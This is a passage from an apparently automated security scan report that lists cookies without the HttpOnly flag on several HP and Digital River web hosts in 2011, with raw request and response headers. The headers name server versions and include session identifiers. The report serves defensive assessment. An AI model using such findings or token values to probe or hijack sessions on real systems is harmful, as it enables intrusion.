Vary: Accept-Encoding,User-Agent
Connection: close

The URL has moved <a href="http://hpproserv.feedroom.com">here</a>

6.9. http://hp.digitalriver.com/store/hpappli/DisplayHomePage/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://hp.digitalriver.com
Path:	/store/hpappli/DisplayHomePage/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ORA_WX_SESSION="10.2.2.14:516-0#0"; path=/
JSESSIONID=83A2AA0EF68A3DE26C700DB3D569FA5C; path=/
VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E5E9783813CD15BA51; expires=Fri, 29-Jun-2012 17:41:24 GMT; path=/
BIGipServerp-drh-dc2pod8-pool1-active=235012618.516.0000; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/hpappli/DisplayHomePage/ HTTP/1.1
Host: hp.digitalriver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: ORA_WX_SESSION="10.2.2.14:516-0#0"; path=/
Set-Cookie: JSESSIONID=83A2AA0EF68A3DE26C700DB3D569FA5C; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E5E9783813CD15BA51; expires=Fri, 29-Jun-2012 17:41:24 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22306202231,0)
Content-Length: 120933
Date: Thu, 30 Jun 2011 11:52:12 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc2app89
Connection: close
Set-Cookie: BIGipServerp-drh-dc2pod8-pool1-active=235012618.516.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...

6.10. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://h30046.www3.hp.com
Path:	/subchoice/country/us/en/subhub.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SMIDENTITY=/3VZN3FtH+hlxGfJLqNFLtagi6gf4FQoPwe2XUIZ2qMfXsZjQRUGqjyKzn3qMcESI99852jNsmZKF8N0Bg4VVhJuRUXPHO+xRK9aQ95vt+5C6GZfX68EdPpeHTOXGtLW0hgmqU4j4eaivBMX2/to2rV7xy+3kTQDin/+NcNlgpSP+rsiPN7uUr1wzRceIshLNO96vteYGXP4F715O95s2m1V8t7jd9tOh/7ICKScDH2l9uNs3fBlMPaBJsyqYYZ6lf7hLd8Ya7WDtahDcQ22hkjwob61vRK+0/q/HUTdSnkKHzoFjRI0hJPBnvw5M87ko0XgWn5deTuTIkSLcAb9jFTCVS6BtuYpJgKCJtFHs8moRxGKDOoNUZUk1OTB2tgBK+QHzbrlSN4QQElS4lQ0bLoqCcWIGSxPHddJkwN0PARJ9O0troqmfLlz7r3lUFPW32wth48xu3sV1rh/fNm7vQMZDcrsydoyK4QwHQ616ZAcbgAKS9ra3uAZytb44gk+CZmGBJ3nTfPbtkYUg08oUfyI/lTuugHuTMd3k9a6L099jZQax5nHSds660rhmJhK; path=/; domain=.hp.com
lang=en-us; path=/
hp_xp=signup; expires=Thu, 30-Jun-2011 19:52:06 GMT; path=/; secure

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /subchoice/country/us/en/subhub.aspx HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.11. https://h30406.www3.hp.com/campaigns/2011/promo/1-9XZBS/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://h30406.www3.hp.com
Path:	/campaigns/2011/promo/1-9XZBS/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

sub_jumpid=ex_r2548%2Fus%2Fmar11%2Fent%2Feb-ts%2F1-9XZBS%2Fmcc; path=/; domain=h30406.www3.hp.com
sub_jumpid=ex_r2548%2Fus%2Fmar11%2Fent%2Feb-ts%2F1-9XZBS%2Fmcc; path=/; domain=h30406.www3.hp.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.12. http://h30415.www3.hp.com/affiliate/hpgateway/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30415.www3.hp.com
Path:	/affiliate/hpgateway/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=XVIOVMS10.100.129.40CKMWJ; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliate/hpgateway/favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: h30415.www3.hp.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=XVIOVMS10.100.129.40CKMWJ; path=/
Date: Fri, 01 Jul 2011 01:19:20 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Last-Modified: Thu, 20 Dec 2007 04:18:36 GMT
ETag: "246950-8e-441b00e407f00"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 142
Content-Type: text/plain

GIF89a...............................!.......,..........S8..#..I'.7....Z....=@Sv...b ...o@.i...!Z..+j.... (.n.%I.".:..l...R#.F...<...tVC..E..;

6.13. http://h30417.www3.hp.com/p/subscribe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30417.www3.hp.com
Path:	/p/subscribe

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

sfr=null:1309434609707; path=/
sft=100001t2mfats80knkj%3A1309434609707; expires=Mon, 31-Dec-2012 23:59:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/subscribe HTTP/1.1
Host: h30417.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.34
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
Content-Length: 16971
Date: Thu, 30 Jun 2011 11:50:09 GMT
P3P: policyref="http://h30417.www3.hp.com/w3c/p3p.xml", CP="NOI NID CURa ADMa OUR NOR COM NAV"
Content-disposition: filename="subscribe"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: sfr=null:1309434609707; path=/
Set-Cookie: sft=100001t2mfats80knkj%3A1309434609707; expires=Mon, 31-Dec-2012 23:59:59 GMT; path=/
Pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en-us">
<head>

<TITLE>HP RSS</TITLE>
<META HTTP-EQUIV="Content-type" CONTENT="tex
...[SNIP]...

6.14. http://h30499.www3.hp.com/t5/Community-Feedback-&-Suggestions/bd-p/community-feedback-suggestions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30499.www3.hp.com
Path:	/t5/Community-Feedback-&-Suggestions/bd-p/community-feedback-suggestions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VISITORID=452137428; Domain=.www3.hp.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/Community-Feedback-&-Suggestions/bd-p/community-feedback-suggestions HTTP/1.1
Host: h30499.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 30 Jun 2011 11:50:13 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: LiSESSIONID=81930FED212F60932E45DEAC6A620F41; Path=/; HttpOnly
Set-Cookie: VISITORID=452137428; Domain=.www3.hp.com; Path=/
Set-Cookie: LithiumUserInfo=""; Domain=.www3.hp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
location: /t5/Community-Feedback-Suggestions/bd-p/community-feedback-suggestions
Content-Length: 0
Connection: close
Content-Type: text/plain

6.15. http://h30499.www3.hp.com/t5/Fortify-Software-Security-Center-Discussion/bd-p/sws-Fortifyforum previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30499.www3.hp.com
Path:	/t5/Fortify-Software-Security-Center-Discussion/bd-p/sws-Fortifyforum

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VISITORID=1940924259; Domain=.www3.hp.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/Fortify-Software-Security-Center-Discussion/bd-p/sws-Fortifyforum HTTP/1.1
Host: h30499.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 30 Jun 2011 11:50:13 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: LiSESSIONID=4EC44E51D5EA3406E04C4CCA77923B77; Path=/; HttpOnly
Set-Cookie: VISITORID=1940924259; Domain=.www3.hp.com; Path=/
Set-Cookie: LithiumUserInfo=""; Domain=.www3.hp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
location: /t5/Fortify-Software-Security-Center/bd-p/sws-Fortifyforum
Content-Length: 0
Connection: close
Content-Type: text/plain

6.16. http://h30499.www3.hp.com/t5/ITRC-Business-Availability-Center-Forum/bd-p/itrc-875 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30499.www3.hp.com
Path:	/t5/ITRC-Business-Availability-Center-Forum/bd-p/itrc-875

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VISITORID=2092928694; Domain=.www3.hp.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/ITRC-Business-Availability-Center-Forum/bd-p/itrc-875 HTTP/1.1
Host: h30499.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 30 Jun 2011 11:50:13 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: LiSESSIONID=D72B3E2C78F0E3C321A16C7F6F437A39; Path=/; HttpOnly
Set-Cookie: VISITORID=2092928694; Domain=.www3.hp.com; Path=/
Set-Cookie: LithiumUserInfo=""; Domain=.www3.hp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
location: /t5/ITRC-Business-Availability/bd-p/itrc-875
Content-Length: 0
Connection: close
Content-Type: text/plain

6.17. http://h30507.www3.hp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30507.www3.hp.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VISITORID=1007929229; Domain=.www3.hp.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: h30507.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 11:50:14 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: LiSESSIONID=6DD69FA24FE2EE09CDD6A6C772D7DC51; Path=/; HttpOnly
Set-Cookie: VISITORID=1007929229; Domain=.www3.hp.com; Path=/
Set-Cookie: LithiumUserInfo=""; Domain=.www3.hp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 41548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...

6.18. https://hp.digitalriver.com/store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hp.digitalriver.com
Path:	/store

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; expires=Fri, 29-Jun-2012 17:43:33 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.19. http://www.shopping.hp.com/accessories-store/computer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/accessories-store/computer

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkvgtCe0AN%2FOynuuVvacAGXm2vi; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /accessories-store/computer HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.20. http://www.shopping.hp.com/accessories-store/handheld previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/accessories-store/handheld

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkti92R2Qt4Nyzovlvacwea0ic%3D; expires=Friday, 28-Oct-2011 12:15:40 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /accessories-store/handheld HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:40 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkti92R2Qt4Nyzovlvacwea0ic%3D; expires=Friday, 28-Oct-2011 12:15:40 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:40 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...

6.21. http://www.shopping.hp.com/accessories-store/printer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/accessories-store/printer

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkijdqT3Qt%2BMyHiulbZcgWW0ic%3D; expires=Friday, 28-Oct-2011 12:15:38 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /accessories-store/printer HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkijdqT3Qt%2BMyHiulbZcgWW0ic%3D; expires=Friday, 28-Oct-2011 12:15:38 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...

6.22. http://www.shopping.hp.com/accessories-store/scanner previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/accessories-store/scanner

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlktjd6S3Qp4MiDvslTbcwLTng%3D%3D; expires=Friday, 28-Oct-2011 12:15:41 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /accessories-store/scanner HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:40 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlktjd6S3Qp4MiDvslTbcwLTng%3D%3D; expires=Friday, 28-Oct-2011 12:15:41 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:41 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...

6.23. http://www.shopping.hp.com/accessories-store/touchpad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/accessories-store/touchpad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkvi92S3wh7My7ov1PdeQGZnWvi; expires=Friday, 28-Oct-2011 12:15:39 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /accessories-store/touchpad HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkvi92S3wh7My7ov1PdeQGZnWvi; expires=Friday, 28-Oct-2011 12:15:39 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:39 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...

6.24. http://www.shopping.hp.com/can/computer/categories/ac_adapters/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/ac_adapters/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkjiduQ2At8My3ovVTbcQed0ic%3D; expires=Friday, 28-Oct-2011 12:15:49 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/ac_adapters/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:49 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjiduQ2At8My3ovVTbcQed0ic%3D; expires=Friday, 28-Oct-2011 12:15:49 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:49 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.25. http://www.shopping.hp.com/can/computer/categories/ac_adapters/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/ac_adapters/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkoidqf3QN7NyzqvlLeeASd0ic%3D; expires=Friday, 28-Oct-2011 12:15:48 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/ac_adapters/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:48 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkoidqf3QN7NyzqvlLeeASd0ic%3D; expires=Friday, 28-Oct-2011 12:15:48 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:48 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.26. http://www.shopping.hp.com/can/computer/categories/carrying_cases/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/carrying_cases/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkui9uQ3A99MyzsvlPZcQGc0ic%3D; expires=Friday, 28-Oct-2011 12:15:52 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/carrying_cases/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:51 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkui9uQ3A99MyzsvlPZcQGc0ic%3D; expires=Friday, 28-Oct-2011 12:15:52 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:52 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.27. http://www.shopping.hp.com/can/computer/categories/carrying_cases/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/carrying_cases/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkpityX3w5%2FMSDqulbacQyfmmvi; expires=Friday, 28-Oct-2011 12:15:50 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:50 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/carrying_cases/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:50 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpityX3w5%2FMSDqulbacQyfmmvi; expires=Friday, 28-Oct-2011 12:15:50 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:50 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.28. http://www.shopping.hp.com/can/computer/categories/digital_cameras/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/digital_cameras/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkiit6f2Al7MC7vvlHXeQSb0ic%3D; expires=Friday, 28-Oct-2011 12:16:45 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/digital_cameras/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:16:45 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkiit6f2Al7MC7vvlHXeQSb0ic%3D; expires=Friday, 28-Oct-2011 12:16:45 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:45 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.29. http://www.shopping.hp.com/can/computer/categories/digital_cameras/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
